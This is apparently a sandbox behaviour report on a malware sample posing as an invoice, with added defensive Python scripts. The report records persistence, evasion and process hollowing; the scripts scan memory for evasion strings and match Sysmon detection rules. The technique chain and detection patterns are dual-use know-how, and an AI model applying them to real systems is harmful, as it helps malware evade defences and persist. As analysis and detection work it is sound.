Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe (dropped file)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe (dropped file)

Boot Survival

Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kECjS

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (52 identical entries)
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Process information set: NOOPENFILEERRORBOX (28 identical entries)

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe TID: 5484 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 3636 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 4216 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 identical entries)
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 9568
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Thread delayed: delay time: 922337203685477
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: RegSvcs.exe, 0000000E.00000002.551236469.00000000067C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C6B6A0 LdrInitializeThunk,14_2_06C6B6A0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory allocated: page read and write | page guard
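Three things in the rows above are worth separating when this section is read. The Sandboxie, Wine and VMware strings (SBIEDLL.DLL, WINE_GET_UNIX_FILE_NAME, the VMware Tools registry key, the SCSI device-map paths, the "VMware SVGA II" adapter name) sit in the sample's own process memory and are the substantive evasion indicators. The "Hyper-V RAW" string in RegSvcs.exe memory appears next to mswsock.dll, which is the Winsock provider catalog any Windows 10 process can have mapped, so on its own it is weak evidence. And the delay value 922337203685477 is 2^63 / 10^4: the 0x8000000000000000 relative interval that SleepEx(INFINITE) hands to NtDelayExecution, expressed in milliseconds, i.e. a thread parked indefinitely rather than a calibrated sandbox-timeout sleep. The script below is an added example, not part of the Joe Sandbox report or of the sample: it scans a constructed memory dump for those indicators in both ASCII and UTF-16LE (the encoding .NET strings have in memory, which an ASCII-only grep misses) and classifies the delay figure. The indicator meanings are the editor's reading of the strings and the dump bytes are constructed.

```python
"""Scan a memory dump for the anti-analysis strings this report lists.

Added example, not part of the Joe Sandbox report. The indicator table is
taken from the 'Binary or memory string' rows above; the dump is a
constructed byte buffer so the script runs offline.
"""

# Indicator -> what its presence suggests (editor's interpretation, not sandbox output).
INDICATORS = {
    b"SbieDll.dll": "Sandboxie user-mode hook DLL name",
    b"WINE_GET_UNIX_FILE_NAME": "Wine-only kernel32 export name",
    b"VMware SVGA II": "VMware display adapter device name",
    b"SOFTWARE\\VMware, Inc.\\VMware Tools": "VMware Tools registry key",
    b"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0":
        "SCSI registry path read to fetch disk vendor strings",
    b"Hyper-V RAW": "Winsock provider name; present in any Windows 10 process, weak on its own",
}

INT64_MAX = 2**63 - 1


def encodings(ascii_bytes):
    """Yield the ASCII form and the UTF-16LE form of one indicator.

    .NET System.String is UTF-16, so a managed stub keeps most of these
    strings in memory as UTF-16LE and an ASCII-only search misses them.
    """
    yield "ascii", ascii_bytes
    yield "utf16le", ascii_bytes.decode("ascii").encode("utf-16-le")


def scan(buf):
    """Return every indicator occurrence in buf, case-insensitive, sorted by offset."""
    lowered = buf.lower()  # bytes.lower() only folds ASCII letters, so UTF-16LE layout survives
    hits = []
    for needle, meaning in INDICATORS.items():
        for enc, pattern in encodings(needle):
            pattern = pattern.lower()
            start = 0
            while True:
                off = lowered.find(pattern, start)
                if off < 0:
                    break
                hits.append({"offset": off, "encoding": enc,
                             "indicator": needle.decode("ascii"), "meaning": meaning})
                start = off + 1
    hits.sort(key=lambda h: h["offset"])
    return hits


def decode_delay(delay_ms):
    """Classify the 'Thread delayed' figure the report prints.

    922337203685477 == 2**63 // 10**4: a relative NtDelayExecution interval of
    0x8000000000000000 100-ns ticks in milliseconds, which is what an INFINITE
    timeout becomes. That is a parked thread, not a calibrated sleep, so it is
    weaker evasion evidence than a 30 s to 10 min sleep.
    """
    if delay_ms >= INT64_MAX // 10_000:
        return "infinite"
    if delay_ms >= 30_000:  # the 30000 threshold the sandbox rows above compare against
        return "long"
    return "short"


# Constructed dump: a managed stub's heap mixing UTF-16 .NET strings with ASCII
# copies returned by native APIs, plus the Winsock catalog noise.
CONSTRUCTED_DUMP = (
    b"\x00" * 16
    + "SBIEDLL.DLL".encode("utf-16-le")
    + b"\x00" * 8
    + b"VMware SVGA II"
    + b"\x00" * 8
    + "SOFTWARE\\VMware, Inc.\\VMware Tools".encode("utf-16-le")
    + b"\x00" * 8
    + b"Hyper-V RAW%SystemRoot%\\system32\\mswsock.dll"
)

if __name__ == "__main__":
    for h in scan(CONSTRUCTED_DUMP):
        print(f"0x{h['offset']:06x} {h['encoding']:8} {h['indicator']!r}: {h['meaning']}")
    print("delay 922337203685477 ->", decode_delay(922337203685477))
```

Run it against a real dump by reading the file into `scan()`; the offsets it prints line up with the `.sdmp` region addresses once the region base is added.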

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 107C008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
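The rows in this and the two preceding sections describe one chain: the sample spawns the .NET SDK tool RegSvcs.exe with no arguments, writes an image into it starting at base 400000 with an MZ header (4D5A), i.e. process hollowing, and the hollowed RegSvcs.exe then drops kECjS.exe under AppData\Roaming, removes its Zone.Identifier stream, registers it in the HKCU Run key and a scheduled task built from an XML file in Temp, and edits the hosts file. The script below is an added example, not part of the Joe Sandbox report, the sample or any vendor's detection content: it runs that chain as six rules over constructed Sysmon-style events (event IDs 1, 10, 11, 13 and 23 with Sysmon field names) and includes a benign scheduled-task event as a control. The Run value data, the SID in the registry path and the use of Sysmon FileDelete (event 23) for the stream deletion are assumptions; the report shows the value name kECjS but not its data.

```python
"""Behaviour-chain triage over Sysmon-style events for the signatures in this report.

Added example, not part of the Joe Sandbox report. The events are constructed
to mirror the rows above; field names follow Sysmon's schema, and the Run
value data and SID are assumed.
"""
import re

SAMPLE = r"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"

PROCESS_VM_OPERATION = 0x0008  # VirtualAllocEx / VirtualProtectEx
PROCESS_VM_WRITE = 0x0020      # WriteProcessMemory
HOSTS = r"c:\windows\system32\drivers\etc\hosts"


def _low(s):
    return (s or "").lower()


def in_user_profile(path):
    return _low(path).startswith("c:\\users\\")


def rule_schtasks_temp_xml(ev):
    # schtasks /Create whose /XML task definition is a .tmp file under %LOCALAPPDATA%\Temp
    if ev["EventID"] != 1 or not _low(ev["Image"]).endswith("\\schtasks.exe"):
        return None
    cl = _low(ev.get("CommandLine"))
    m = re.search(r'/xml\s+"?([^"]+\.tmp)"?', cl)
    if "/create" in cl and m and "\\appdata\\local\\temp\\" in m.group(1):
        return "T1053.005 task created from Temp XML " + m.group(1)
    return None


def rule_run_key(ev):
    # Run value whose data points into the user profile
    if ev["EventID"] == 13 and "\\currentversion\\run\\" in _low(ev["TargetObject"]) \
            and in_user_profile(ev.get("Details")):
        return "T1547.001 Run key -> " + ev["Details"]
    return None


def rule_hosts_write(ev):
    # any write to the hosts file; AV update and telemetry names are the usual targets
    if ev["EventID"] == 11 and _low(ev["TargetFilename"]) == HOSTS:
        return "hosts file written by " + ev["Image"]
    return None


def rule_motw_removed(ev):
    # Zone.Identifier stream deleted: hides that the file came from the Internet
    if ev["EventID"] == 23 and _low(ev["TargetFilename"]).endswith(":zone.identifier"):
        return "T1553.005 MOTW stripped from " + ev["TargetFilename"]
    return None


def rule_inject_regsvcs(ev):
    # a user-profile binary opening RegSvcs.exe with the rights hollowing needs
    if ev["EventID"] != 10:
        return None
    need = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
    if int(ev["GrantedAccess"], 16) & need != need:
        return None
    if _low(ev["TargetImage"]).endswith("\\regsvcs.exe") and in_user_profile(ev["SourceImage"]):
        return "T1055.012 write access to RegSvcs.exe from " + ev["SourceImage"]
    return None


def rule_regsvcs_from_user_binary(ev):
    # RegSvcs.exe is an SDK tool; a parent under C:\Users is abnormal
    if ev["EventID"] == 1 and _low(ev["Image"]).endswith("\\regsvcs.exe") \
            and in_user_profile(ev.get("ParentImage")):
        return "T1218.009 RegSvcs.exe spawned by " + ev["ParentImage"]
    return None


RULES = [rule_schtasks_temp_xml, rule_run_key, rule_hosts_write,
         rule_motw_removed, rule_inject_regsvcs, rule_regsvcs_from_user_binary]


def triage(events):
    """Return (EventID, rule name, message) for every rule that fires."""
    findings = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                findings.append((ev["EventID"], rule.__name__, msg))
    return findings


# Constructed events; GrantedAccess 0x1FFFFF is PROCESS_ALL_ACCESS.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\schtasks.exe", "ParentImage": SAMPLE,
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp"'},
    {"EventID": 10, "SourceImage": SAMPLE, "TargetImage": REGSVCS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": REGSVCS, "ParentImage": SAMPLE, "CommandLine": REGSVCS},
    {"EventID": 13, "Image": REGSVCS, "Details": DROPPED,  # value data assumed
     "TargetObject": r"HKU\S-1-5-21-1000-2000-3000-1001\Software\Microsoft\Windows\CurrentVersion\Run\kECjS"},
    {"EventID": 23, "Image": REGSVCS, "TargetFilename": DROPPED + ":Zone.Identifier"},
    {"EventID": 11, "Image": REGSVCS, "TargetFilename": r"C:\Windows\System32\drivers\etc\hosts"},
    # benign control: an admin-created task with no XML import
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /Create /TN "Backup" /TR "C:\Tools\backup.exe" /SC DAILY'},
]

if __name__ == "__main__":
    for eid, rule, msg in triage(EVENTS):
        print(f"EID {eid:2d} {rule:30} {msg}")
```

Each rule is deliberately narrow; what makes the chain convincing is that all six fire from the same parent and its hollowed child within seconds, so in production correlate on ProcessGuid and ParentProcessGuid rather than alerting on any one rule alone.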
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
